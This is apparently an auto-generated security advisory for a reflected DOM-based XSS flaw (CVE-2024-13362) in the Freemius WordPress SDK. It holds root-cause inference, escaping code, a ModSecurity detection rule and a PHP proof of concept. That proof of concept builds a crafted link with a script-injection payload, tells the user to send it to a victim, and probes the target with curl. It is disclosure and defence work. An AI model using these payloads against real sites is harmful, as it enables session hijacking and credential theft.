Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 6, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (automatic-internal-links-for-seo)

Severity: Medium (CVSS 6.1)
CWE: 79
Vulnerable Version: 2.0.0
Patched Version:
Disclosed: April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) issue found in multiple WordPress plugins and/or themes using the Freemius framework, specifically in versions up to 2.10.1. The flaw involves insufficient sanitization of the ‘url’ parameter, allowing unauthenticated attackers to inject arbitrary JavaScript that executes when a victim clicks a crafted link. The CVSS v3.1 score is 6.1 (Medium), with a network attack vector, low attack complexity, no privileges required, but user interaction is required.

Root Cause: The Freemius SDK appears to handle a ‘url’ parameter in a client-side JavaScript context (DOM-based XSS). The description confirms that input sanitization and output escaping are missing. Because no plugin source code is available, Atomic Edge research infers that the vulnerability likely exists in a Freemius callback or redirect handler that takes a URL from the query string and writes it directly into the page DOM without proper encoding. This is a classic pattern where the ‘url’ parameter is echoed back in a JavaScript context or used to set window.location or innerHTML. The CWE classification (79) strongly supports this interpretation.

Exploitation: An attacker crafts a malicious link pointing to a vulnerable WordPress site with a manipulated ‘url’ parameter. The parameter value, most likely provided via the GET query string, is reflected into the page without sanitization, allowing injection of script tags or event handlers. The exploit leverages social engineering to trick a user into clicking the crafted link. The specific endpoint is likely one of the Freemius SDK’s AJAX or redirect handlers (e.g., /wp-admin/admin-ajax.php?action=fs_redirect or similar). The payload would be something like: ‘https://target-site.com/?url=javascript:alert(document.cookie)’ or a script tag in an encoded form. Successful execution runs arbitrary JavaScript in the victim’s browser within the context of the WordPress site.

Remediation: The fix should involve proper sanitization and escaping of the ‘url’ parameter. Atomic Edge analysis recommends using WordPress’s built-in functions like esc_url() to ensure the URL is safe for output, and potentially validating the URL against a whitelist of allowed destinations. The plugin should also avoid directly embedding user-supplied input into JavaScript code or DOM manipulation without proper encoding. Additionally, implementing a nonce check or capability verification (if applicable) could help, though the primary fix is output escaping.
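As an added illustration of the remediation above (example code written for this page, not Freemius SDK or Atomic Edge code), the following client-side handler validates a `url` query parameter before using it as a navigation target or writing it into a link: it parses the value with the URL parser, allows only http(s) schemes, checks the host against an allow-list and attribute-escapes the result. The allow-listed host names, the page origin used when resolving relative paths and the 2048-character length cap are assumptions.

```javascript
// Added example for this page (not Freemius SDK or Atomic Edge code):
// validate a `url` query parameter before it is used as a redirect target
// or written into a link, applying the remediation described above.
// ALLOWED_HOSTS and the page origin used in tests are assumed values.
const ALLOWED_HOSTS = new Set(['target-site.com', 'www.target-site.com']);

// Return a canonical absolute URL string for `raw`, or null to reject it.
// Relative paths are resolved against pageOrigin; anything that is not an
// http(s) URL on an allow-listed host is rejected rather than echoed back.
function validateUrlParam(raw, pageOrigin, allowedHosts = ALLOWED_HOSTS) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) {
    return null; // missing, empty or implausibly long (2048 is an assumed cap)
  }
  let parsed;
  try {
    // "javascript:alert(1)" keeps its own scheme; "/wp-admin/" is resolved against the origin
    parsed = new URL(raw, pageOrigin);
  } catch (e) {
    return null; // unparsable input
  }
  // Scheme check defeats javascript:, data: and vbscript: targets; the URL
  // parser has already lowercased the scheme, so "JaVaScRiPt:" is caught too.
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  // Host allow-list defeats open redirects, including "//evil.example" forms.
  if (!allowedHosts.has(parsed.hostname)) return null;
  // Embedded credentials ("https://user:pw@host/") are never wanted here.
  if (parsed.username !== '' || parsed.password !== '') return null;
  // parsed.href percent-encodes <, > and ", so '"><script>' cannot break out of an attribute
  return parsed.href;
}

// Attribute-escape a value for the case where markup is still built as a
// string; with DOM APIs (a.href = safe) this step is handled by the browser.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Build the "continue" link for a validated destination, or return null so
// the caller renders nothing instead of reflecting the raw parameter.
function renderRedirectLink(raw, pageOrigin) {
  const safe = validateUrlParam(raw, pageOrigin);
  return safe === null ? null : '<a href="' + escapeHtmlAttr(safe) + '">Continue</a>';
}

// Read `url` from a query string as a page script would from location.search.
function redirectTargetFromQuery(search, pageOrigin) {
  return validateUrlParam(new URLSearchParams(search).get('url'), pageOrigin);
}
```

In a browser the validated value would be assigned via `a.href = safe` or `location.assign(safe)` rather than through `innerHTML`, which is what the attribute-escaping fallback guards against.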

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. Since the attack requires user interaction (clicking a link), it is not wormable but can be used in targeted phishing campaigns. The scope change in CVSS (S:C) indicates the vulnerability can impact resources beyond the vulnerable component, such as stealing authentication tokens or accessing sensitive data on other parts of the site.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Virtual patch: Block reflected XSS attempts via the 'url' parameter commonly used in Freemius SDK.
# This rule targets the query string parameter 'url' with common XSS patterns.
# Note: The exact vulnerable endpoint is not confirmed, but this protects all requests with malicious 'url' parameter.
# Note: ARGS values are already URL-decoded by ModSecurity; the %3C alternative only matters for double-encoded input.
SecRule ARGS:url "@rx (?i)(?:(?:<|%3C).*script|javascript:|onerror=|onload=|alert\(|prompt\(|confirm\()" \
  "id:10013362,phase:2,deny,status:403,msg:'CVE-2024-13362 - Freemius DOM-Based XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Configuration
$target_url = 'http://example.com';  // Change to the target WordPress site
// Note: The exact vulnerable endpoint is unclear, but likely involves the 'url' parameter.
// This PoC assumes the vulnerable parameter is passed in the main query string.

// Crafted payload: inject a script that executes an alert
$payload = '"><script>alert("XSS")</script>';

// Build the malicious URL (http_build_query() URL-encodes the payload)
$malicious_url = $target_url . '/?' . http_build_query(['url' => $payload]);

// Output the exploit URL for manual use (since we cannot simulate DOM execution via PHP)
echo "[+] Malicious URL: " . $malicious_url . "\n";
echo "[+] Send this link to the victim. If vulnerable, a JavaScript alert will appear.\n";

// Optionally: perform a cURL request to confirm reflection (though this will not execute JS)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if ($response === false) {
    // curl_exec() returns false on transport errors; report it rather than passing false to strpos()
    echo "[-] Request failed: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
curl_close($ch);

// Check if the payload is reflected in the response (simple check)
if (strpos($response, $payload) !== false) {
    echo "[+] Confirmed: The payload appears in the page source.\n";
} else {
    echo "[-] The payload may not be reflected. The vulnerable endpoint may differ.\n";
}
